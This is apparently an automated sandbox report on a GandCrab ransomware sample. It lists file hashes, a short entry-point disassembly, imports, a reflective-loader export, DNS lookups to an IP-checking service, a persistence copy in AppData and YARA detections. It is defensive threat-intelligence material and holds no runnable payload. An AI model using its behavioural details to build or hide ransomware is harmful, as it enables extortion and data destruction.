                                  Preview:MZ......................@...............................................!..L.!This (..X..m cannot be run in DOS mode....$....................}.....B.....B...........1.......Y...G.....~.....y.....|....Rich...................PE..L....6.Z............................ K.......................................Z....... ....@.........................P...U............@.......................P.......................................................................................text...H........................... ..`.rdata..&q.......r..................@..@.data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.4901978767924895
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:IJr8RvvhZ3.exe
                                  File size:71680
                                  MD5:b77359bc85030f5f856b8010c0ddf6a8
                                  SHA1:5bff219a3d20203a239a23db69385f2611e67f5d
                                  SHA256:afd36e5d309ba8576b7e6a31ab1b3af4c3c0530052a2c31b97c688c0e2515005
                                  SHA512:c0dc63351d03b120a3b20b31596c0d4235fa4ef4d8228d01450486f73226cc40ab357d5050a24e51c4783cfc55f005e59d8fb8e73644beae0590554a3efbe829
                                  SSDEEP:1536:sZZZZZZZZZZZZpXzzzzzzzzzzzzADypczUk+lkZJngWMqqU+2bbbAV2/S2OvvdZl:zd5BJHMqqDL2/Ovvdr
                                  TLSH:1A636C1DB2D1B293F1E396B9FAB57E25445D2D103B056BEB08A369F568120F16C3B703
                                  File Content Preview:MZ......................@...............................................!..L.!This ......m cannot be run in DOS mode....$.........................}.......B.......B...............1.........Y.....G.......~.......y.......|.....Rich....................PE..L..
                                  Icon Hash:00828e8e8686b000
                                  Entrypoint:0x10004b20
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x10000000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH
                                  Time Stamp:0x5A9C3687 [Sun Mar 4 18:10:15 2018 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:8735e6cad23590d9b5b60978db488a28
                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 4Ch
                                  push 000003E8h
                                  call dword ptr [1000A098h]
                                  call 00007FD018C883BFh
                                  test eax, eax
                                  je 00007FD018C8872Ah
                                  push 00000000h
                                  call dword ptr [1000A168h]
                                  push 00000000h
                                  push 00000000h
                                  push 00000000h
                                  push 10002D30h
                                  push 00000000h
                                  push 00000000h
                                  call dword ptr [1000A108h]
                                  mov dword ptr [ebp-04h], eax
                                  cmp dword ptr [ebp-04h], 00000000h
                                  je 00007FD018C8874Eh
                                  push 00001388h
                                  mov eax, dword ptr [ebp-04h]
                                  push eax
                                  call dword ptr [1000A080h]
                                  cmp eax, 00000102h
                                  jne 00007FD018C8872Eh
                                  push 00000000h
                                  mov ecx, dword ptr [ebp-04h]
                                  push ecx
                                  call dword ptr [1000A094h]
                                  mov edx, dword ptr [ebp-04h]
                                  push edx
                                  call dword ptr [1000A10Ch]
                                  call 00007FD018C88454h
                                  call 00007FD018C87E3Fh
                                  lea ecx, dword ptr [ebp-4Ch]
                                  call 00007FD018C8A0D7h
                                  mov dword ptr [ebp-24h], 00000000h
                                  mov dword ptr [ebp-20h], 00000000h
                                  mov dword ptr [ebp-18h], 00000000h
                                  mov dword ptr [ebp-28h], 00000000h
                                  lea eax, dword ptr [ebp-20h]
                                  push eax
                                  lea ecx, dword ptr [ebp-24h]
                                  push ecx
                                  lea edx, dword ptr [ebp-28h]
                                  push edx
                                  lea eax, dword ptr [ebp-18h]
                                  push eax
                                  lea ecx, dword ptr [ebp-4Ch]
                                  call 00007FD018C8A053h
                                  mov dword ptr [ebp-2Ch], 00000000h
                                  mov dword ptr [ebp-0Ch], 00000000h
                                  mov ecx, dword ptr [ebp-18h]
                                  call 00007FD018C8863Dh
                                  Programming Language:
                                  • [ C ] VS2013 build 21005
                                  • [IMP] VS2008 SP1 build 30729
                                  • [EXP] VS2013 build 21005
                                  • [RES] VS2013 build 21005
                                  • [LNK] VS2013 build 21005
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x105500x55.rdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x105a80xb4.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x1e0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x150000xaf4.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0xa0000x200.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x84480x8600False0.4546991604477612data6.32052618210059IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0xa0000x71260x7200False0.47765899122807015data6.1644872822657275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x120000xa840xc00False0.3056640625data3.538638851099626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .CRT0x130000x40x200False0.033203125data0.04078075625387198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc0x140000x1e00x200False0.52734375data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x150000xaf40xc00False0.7932942708333334data6.537931848954439IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountry
                                  RT_MANIFEST0x140600x17dXML 1.0 document textEnglishUnited States
                                  DLLImport
                                  KERNEL32.dllReadFile, SetFilePointer, GetFileAttributesW, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, GetProcAddress, Process32FirstW, GetTempPathW, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
                                  USER32.dllBeginPaint, wsprintfW, TranslateMessage, LoadCursorW, LoadIconW, MessageBoxA, GetMessageW, EndPaint, DestroyWindow, RegisterClassExW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, wsprintfA, GetForegroundWindow, SetWindowLongW
                                  GDI32.dllTextOutW
                                  ADVAPI32.dllFreeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptExportKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, AllocateAndInitializeSid
                                  SHELL32.dllShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW
                                  CRYPT32.dllCryptStringToBinaryA, CryptBinaryToStringA
                                  WININET.dllInternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
                                  PSAPI.DLLEnumDeviceDrivers, GetDeviceDriverBaseNameW
                                  NameOrdinalAddress
                                  _ReflectiveLoader@010x10005ff0
                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States
                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 31, 2022 23:52:00.770551920 CEST5083553192.168.2.78.8.8.8
                                  Aug 31, 2022 23:52:00.789747953 CEST53508358.8.8.8192.168.2.7
                                  Aug 31, 2022 23:52:19.089329004 CEST6392653192.168.2.78.8.8.8
                                  Aug 31, 2022 23:52:19.109457970 CEST53639268.8.8.8192.168.2.7
                                  Aug 31, 2022 23:52:29.696835041 CEST5333653192.168.2.78.8.8.8
                                  Aug 31, 2022 23:52:29.716440916 CEST53533368.8.8.8192.168.2.7
                                  Aug 31, 2022 23:52:40.983445883 CEST5051353192.168.2.78.8.8.8
                                  Aug 31, 2022 23:52:41.002794027 CEST53505138.8.8.8192.168.2.7
                                  Aug 31, 2022 23:52:54.908077955 CEST6535653192.168.2.78.8.8.8
                                  Aug 31, 2022 23:52:54.927706003 CEST53653568.8.8.8192.168.2.7
                                  Aug 31, 2022 23:53:08.850558043 CEST5152653192.168.2.78.8.8.8
                                  Aug 31, 2022 23:53:08.868645906 CEST53515268.8.8.8192.168.2.7
                                  Aug 31, 2022 23:53:24.176354885 CEST5878453192.168.2.78.8.8.8
                                  Aug 31, 2022 23:53:24.195504904 CEST53587848.8.8.8192.168.2.7
                                  Aug 31, 2022 23:53:40.707055092 CEST6460853192.168.2.78.8.8.8
                                  Aug 31, 2022 23:53:40.724586010 CEST53646088.8.8.8192.168.2.7
                                  Aug 31, 2022 23:53:54.471183062 CEST5874653192.168.2.78.8.8.8
                                  Aug 31, 2022 23:53:54.489445925 CEST53587468.8.8.8192.168.2.7
                                  Aug 31, 2022 23:54:13.856695890 CEST6124853192.168.2.78.8.8.8
                                  Aug 31, 2022 23:54:13.874511003 CEST53612488.8.8.8192.168.2.7
                                  Aug 31, 2022 23:54:21.065799952 CEST5275053192.168.2.78.8.8.8
                                  Aug 31, 2022 23:54:21.085493088 CEST53527508.8.8.8192.168.2.7
                                  Aug 31, 2022 23:54:39.098484993 CEST5905353192.168.2.78.8.8.8
                                  Aug 31, 2022 23:54:39.117619038 CEST53590538.8.8.8192.168.2.7
                                  Aug 31, 2022 23:54:57.904921055 CEST6201853192.168.2.78.8.8.8
                                  Aug 31, 2022 23:54:57.924809933 CEST53620188.8.8.8192.168.2.7
                                  Aug 31, 2022 23:55:17.357094049 CEST6432253192.168.2.78.8.8.8
                                  Aug 31, 2022 23:55:17.374757051 CEST53643228.8.8.8192.168.2.7
                                  Aug 31, 2022 23:55:35.095211029 CEST5019753192.168.2.78.8.8.8
                                  Aug 31, 2022 23:55:35.114885092 CEST53501978.8.8.8192.168.2.7
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Aug 31, 2022 23:52:00.770551920 CEST192.168.2.78.8.8.80x2ba7Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:52:19.089329004 CEST192.168.2.78.8.8.80x47b1Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:52:29.696835041 CEST192.168.2.78.8.8.80x3121Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:52:40.983445883 CEST192.168.2.78.8.8.80x13ccStandard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:52:54.908077955 CEST192.168.2.78.8.8.80x6518Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:53:08.850558043 CEST192.168.2.78.8.8.80x23bfStandard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:53:24.176354885 CEST192.168.2.78.8.8.80x9133Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:53:40.707055092 CEST192.168.2.78.8.8.80x61b6Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:53:54.471183062 CEST192.168.2.78.8.8.80x6884Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:54:13.856695890 CEST192.168.2.78.8.8.80xbbd6Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:54:21.065799952 CEST192.168.2.78.8.8.80xea49Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:54:39.098484993 CEST192.168.2.78.8.8.80xf3b1Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:54:57.904921055 CEST192.168.2.78.8.8.80x55f7Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:55:17.357094049 CEST192.168.2.78.8.8.80x1c7Standard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)
                                  Aug 31, 2022 23:55:35.095211029 CEST192.168.2.78.8.8.80x597eStandard query (0)ipv4bot.whatismyipaddress.comA (IP address)IN (0x0001)

                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:23:51:54
                                  Start date:31/08/2022
                                  Path:C:\Users\user\Desktop\IJr8RvvhZ3.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\IJr8RvvhZ3.exe"
                                  Imagebase:0xf140000
                                  File size:71680 bytes
                                  MD5 hash:B77359BC85030F5F856B8010C0DDF6A8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.246598852.000000000F14A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  Reputation:low

                                  Target ID:3
                                  Start time:23:52:12
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0x7ff732630000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000000.284909876.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, Author: ReversingLabs
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  Reputation:low

                                  Target ID:11
                                  Start time:23:52:20
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000B.00000000.302753635.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:12
                                  Start time:23:52:29
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000002.344076256.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000000.326861802.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  Reputation:low

                                  Target ID:14
                                  Start time:23:52:40
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000002.374541763.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                  • Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000000.345391884.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:15
                                  Start time:23:52:49
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000002.373855926.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000000.366415830.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:16
                                  Start time:23:52:59
                                  Start date:31/08/2022
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
                                  Imagebase:0xf580000
                                  File size:71680 bytes
                                  MD5 hash:937D3395BC50812DBAB14034E2FCC25B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000010.00000000.384391365.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000010.00000002.406139264.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                  • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
